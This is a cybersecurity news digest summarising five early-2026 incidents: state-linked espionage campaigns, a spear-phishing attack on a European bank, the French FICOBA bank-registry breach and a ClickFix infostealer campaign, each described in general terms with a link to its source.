Major Global Incidents Target Governments, Financial Institutions, Critical Infrastructure and Users

TGR-STA-1030 is classified as a state-backed cyber espionage actor, meaning its activities likely support strategic or geopolitical objectives of a government rather than criminal profit. Researchers believe the group has been active since at least January 2024 and has expanded its operations significantly over time. Investigators found several indicators suggesting links to an Asian state actor. These include the attackers’ working hours aligning with Asian time zones, the use of infrastructure and services located in that region, and linguistic traces in the attackers’ tools and online activity.

The cyber-espionage campaign has affected a wide range of organisations globally. Victims include government ministries, law enforcement agencies, border control departments, and critical infrastructure entities such as those involved in energy, trade, and natural resources. Targets span 37 different countries, showing the broad international scope of the operation. In addition to the confirmed breaches, the attackers were observed conducting reconnaissance against government infrastructure in up to 155 countries during late 2025, suggesting the campaign could expand even further.

Several high-profile government entities were reportedly compromised, including ministries responsible for financial management and national administrative functions. These targets indicate the attackers are particularly interested in collecting political, economic, and diplomatic intelligence.

To infiltrate victim networks, the attackers relied on a combination of phishing campaigns and exploitation of known software vulnerabilities, often referred to as “N-day vulnerabilities.” These are flaws that have already been publicly disclosed but remain unpatched in many systems.

The group attempted to exploit vulnerabilities in widely used enterprise software and platforms, including products from major vendors such as Microsoft, SAP, Atlassian, Commvault, and other network or email management systems. By targeting these commonly deployed technologies, the attackers increased their chances of gaining entry into organisational environments.

Notably, researchers found no evidence that the group used zero-day vulnerabilities, meaning they relied primarily on existing, publicly known weaknesses, rather than undisclosed software flaws.

After gaining access to victim networks, the attackers deployed a variety of tools to maintain control and move laterally through systems. In some cases, the group also leveraged advanced malware capabilities, including rootkits designed to maintain persistent access and evade detection. Such tools allow attackers to remain hidden within a network for extended periods while collecting intelligence.

The primary objective of the campaign appears to be long-term cyber espionage rather than immediate disruption or financial theft. By infiltrating government agencies and critical infrastructure organisations, the attackers can gather sensitive information related to policy decisions, diplomatic relations, economic strategies, and national security activities. The attackers carefully conduct reconnaissance, escalate privileges, and move laterally within compromised environments to identify valuable systems and data. Their operations show a methodical approach typical of advanced persistent threat (APT) groups - focusing on stealth, persistence, and intelligence collection rather than quick attacks.

The discovery of TGR-STA-1030 highlights the continuing evolution of nation state cyber espionage campaigns. The scale of the operation, affecting dozens of countries and dozens of government organisations, demonstrates how cyber operations have become a major tool for geopolitical intelligence gathering. The campaign also underscores a persistent cybersecurity challenge: many organisations remain vulnerable to attacks exploiting known software vulnerabilities that have not been patched. Even without zero-day exploits, sophisticated threat actors can successfully compromise high-value targets by combining phishing with exploitation of widely used enterprise software.

https://thehackernews.com/2026/02/asian-state-backed-group-tgr-sta-1030.html

UAC-0050 Spear-Phishing Campaign Targets European Financial Institution with Remote Access Malware

A cyber campaign attributed to UAC-0050, also known as the DaVinci Group, targeted a European financial institution through a social-engineering attack designed to gain remote access to internal systems. The activity suggests the group may be expanding its operations beyond Ukrainian targets to organisations supporting Ukraine’s reconstruction and regional development.

The attack began with a spear-phishing email that impersonated a Ukrainian judicial domain. The message contained a link directing the victim to download a malicious archive hosted on the file-sharing service PixelDrain, which attackers used to bypass reputation-based security controls.

The downloaded file triggered a multi-stage infection chain involving several nested archives (ZIP, RAR, and a password-protected 7-Zip file). Inside the final archive was an executable disguised as a PDF using a double extension (.pdf.exe), a common tactic used to trick users into launching malware.

When executed, the payload installed Remote Manipulator System (RMS), legitimate remote-desktop software that enables attackers to remotely control the compromised machine, transfer files, and maintain persistent access. Using legitimate tools allows attackers to blend malicious activity with normal system behaviour and avoid detection by security tools.

According to researchers, the targeted victim was a senior legal and policy advisor involved in procurement, a role that likely has access to sensitive financial and operational information. Analysts believe the campaign may aim to support intelligence gathering or financial theft related to institutions involved in Ukraine-related initiatives.

In short, the operation demonstrates how UAC-0050 continues to rely on social engineering and legitimate remote-administration tools to compromise high-value targets and maintain stealthy access to sensitive institutional data.

https://thehackernews.com/2026/02/uac-0050-targets-european-financial.html

Stolen Credentials Used to Access France’s National Bank Account Database, Exposing 1.2 Million Records

A cyber incident in France exposed sensitive data from the country’s national bank account registry, known as FICOBA (French National Bank Account Registry), after an attacker gained unauthorised access using stolen credentials belonging to a government official. The breach was disclosed by the French Ministry of Economy and Finance and occurred in January 2026.

The attacker used the compromised credentials to access parts of the database that contains records of all bank accounts opened in French financial institutions, and is used by government agencies for tax enforcement, fraud investigations, and judicial processes. Through this access, the attacker was able to view information linked to approximately 1.2 million bank accounts.

The compromised data included bank account numbers, account holder names, addresses, and - in some cases - tax identification numbers. However, authorities emphasised that the database does not contain account balances or transaction capabilities, meaning the attacker could not directly access funds or perform banking operations.

Once the breach was discovered, the unauthorised access was immediately terminated and authorities began responding to the incident. Affected individuals are being notified, and banks have been advised to warn customers about potential phishing attempts or scams that could result from the exposed data. The French government has also launched an investigation and informed the national data protection authority.

Although the identity of the attacker remains unknown, the incident highlights the risks posed by credential compromise and the potential consequences of unauthorised access to centralised financial databases containing large volumes of sensitive personal information.

https://www.theregister.com/2026/02/22/french_bank_hack/

ClickFix Malware Campaign Steals Data from Crypto Wallets and Dozens of Web Browsers

Researchers have identified a new malware campaign using the ClickFix social engineering technique to infect users with an infostealer capable of targeting cryptocurrency wallets and more than 25 web browsers. The attack relies on deceptive web pages that trick victims into executing malicious commands, ultimately installing malware that steals sensitive data.

The campaign typically begins when a user visits a compromised or malicious website and is presented with a fake verification page, often designed to resemble a security check such as a CAPTCHA. The page instructs the user to perform steps to “fix” an issue usually copying and pasting a command into their system. If the user follows these instructions, the command downloads and executes malware on the device.

Once installed, the infostealer collects a wide range of information from the infected system. This includes credentials stored in web browsers, cryptocurrency wallet data, cookies, and other sensitive information that can be used for account takeover or financial theft. The malware specifically targets data from over 25 different browsers, increasing the chances of extracting valuable credentials and digital assets.

Researchers note that the attack demonstrates how cybercriminals are increasingly relying on social engineering rather than sophisticated exploits. By convincing victims to execute the malicious commands themselves, attackers can bypass many traditional security controls and deploy information-stealing malware more easily.

https://hackread.com/clickfix-attack-crypto-wallets-browsers-infostealer/

Google Disrupts Global Chinese Cyber-Espionage Network Targeting Governments and Telecom Providers

Researchers at Google announced that they disrupted a large cyber-espionage campaign linked to China that had targeted government organisations and telecommunications providers across dozens of countries. The operation was attributed to a threat cluster tracked as UNC2814, which has reportedly been active since at least 2017.

According to Google’s threat intelligence team, the campaign affected at least 53 organisations in 42 countries, including entities in Africa, Asia, and the Americas. The attackers primarily targeted telecommunications companies and government institutions, sectors that can provide valuable intelligence about communications networks and individuals of interest.

The threat actors used various online services to manage their operations and support data collection. Investigators found that the group leveraged Google services such as Google Sheets and other cloud infrastructure to help manage targeting information and coordinate their espionage activities.

After discovering the campaign, Google worked with partners to disable the attackers’ infrastructure, including shutting down cloud projects and accounts linked to the operation. The company also blocked systems the group used to conduct surveillance and collect stolen information.

Security analysts described the campaign as part of a broader effort by China-linked actors to conduct long-term intelligence gathering, particularly through telecommunications networks that can reveal communications patterns and information about targeted individuals or organisations.

https://therecord.media/china-cyber-espionage-google-disrupt